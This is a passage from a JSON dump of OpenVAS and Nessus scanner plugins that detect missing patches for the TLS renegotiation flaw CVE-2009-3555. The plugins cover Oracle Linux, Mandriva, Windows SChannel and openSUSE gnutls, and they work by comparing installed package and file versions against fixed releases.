implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122382\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:17:53 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0164\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0164 - openssl097a security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0164\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0164.html\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"openssl097a\", rpm:\"openssl097a~0.9.7a~9.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2018-01-02T10:54:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of nss", "modified": "2018-01-01T00:00:00", "published": "2010-04-09T00:00:00", "id": "OPENVAS:1361412562310830970", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830970", "type": "openvas", "title": "Mandriva Update for nss MDVSA-2010:069 (nss)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for nss MDVSA-2010:069 (nss)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in nss:\n\n The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as\n used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl\n in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l,\n GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS)\n 3.12.4 and earlier, and other products, does not properly associate\n renegotiation handshakes with an existing connection, which allows\n man-in-the-middle attackers to insert data into HTTPS sessions,\n and possibly other types of sessions protected by TLS or SSL, by\n sending an unauthenticated request that is processed retroactively\n by a server in a post-renegotiation context, related to a plaintext\n injection attack, aka the Project Mogul issue (CVE-2009-3555).\n \n Additionally the NSPR package has been upgraded to 4.8.4 that brings\n numerous upstream fixes.\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\n \n This update provides the latest versions of NSS and NSPR libraries\n and for which NSS is not vulnerable to this attack.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"nss on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00000.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830970\");\n script_version(\"$Revision: 8266 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 08:28:32 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-09 11:11:25 +0200 (Fri, 09 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:069\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Mandriva Update for nss MDVSA-2010:069 (nss)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:09:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-049.", "modified": "2017-04-11T00:00:00", "published": "2010-08-11T00:00:00", "id": "OPENVAS:900247", "href": "http://plugins.openvas.org/nasl.php?oid=900247", "type": "openvas", "title": "Remote Code Execution Vulnerabilities in SChannel (980436)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-049.nasl 5934 2017-04-11 12:28:28Z antu123 $\n#\n# Remote Code Execution Vulnerabilities in SChannel (980436)\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-09-12\n# - To detect file version 'SChannel.dll' on vista, win 2008 and win 7\n#\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Fioundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_id(900247);\n script_version(\"$Revision: 5934 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-11 14:28:28 +0200 (Tue, 11 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-11 15:08:29 +0200 (Wed, 11 Aug 2010)\");\n script_bugtraq_id(36935);\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"Remote Code Execution Vulnerabilities in SChannel (980436)\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/54158\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/MS10-049.mspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : \"Successful exploitation of this issue may allow attackers to perform limited\n man-in-the-middle attacks to inject data into the beginning of the\n application protocol stream to execute HTTP transactions, bypass\n authentication.\n Impact Level: Application\");\n script_tag(name : \"affected\" , value : \"Micorsoft Windows 7\n Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2K3 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\");\n script_tag(name : \"insight\" , value : \"A flaw exists in the Microsoft Windows SChannel (Secure Channel)\n authentication component when using certificate based authentication, which\n allows spoofing.\");\n script_tag(name : \"solution\" , value : \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/MS10-049.mspx\");\n script_tag(name : \"summary\" , value : \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-049.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\n## Check for Hotfix 980436 (MS10-049)\nif(hotfix_missing(name:\"980436\") == 0){\n exit(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath, file_name:\"Schannel.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n ## Grep for Schannel.dll < 5.1.2600.6006\n if(version_is_less(version:dllVer, test_version:\"5.1.2600.6006\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 2003\nif(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Grep for Schannel.dll version < 5.2.3790.4724\n if(version_is_less(version:dllVer, test_version:\"5.2.3790.4724\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath, file_name:\"Schannel.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\n# Windows Vista\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Schannel.dll version < 6.0.6001.18490\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18490\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Schannel.dll version < 6.0.6002.18269\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18269\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows Server 2008\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Schannel.dll version < 6.0.6001.18490\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18490\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Schannel.dll version < 6.0.6002.18269\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18269\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n # Grep for Schannel.dll version < 6.1.7600.16612\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16612\")){\n security_message(0);\n }\n}\n\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-17T14:05:44", "description": "The SSL-renegotiation 'authentication gap' has been fixed in gnutls.\nCVE-2009-3555 has been assigned to this issue.", "edition": 23, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2011-05-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgnutls-extra26", "p-cpe:/a:novell:opensuse:libgnutls26", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:libgnutls26-32bit", "p-cpe:/a:novell:opensuse:gnutls", "p-cpe:/a:novell:opensuse:libgnutls-devel", "p-cpe:/a:novell:opensuse:libgnutls-extra-devel"], "id": "SUSE_11_2_GNUTLS-101025.NASL", "href": "https://www.tenable.com/plugins/nessus/53728", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3388.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53728);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-1)\");\n script_summary(english:\"Check for the gnutls-3388 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SSL-renegotiation 'authentication gap' has been fixed in gnutls.\nCVE-2009-3555 has been assigned to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n 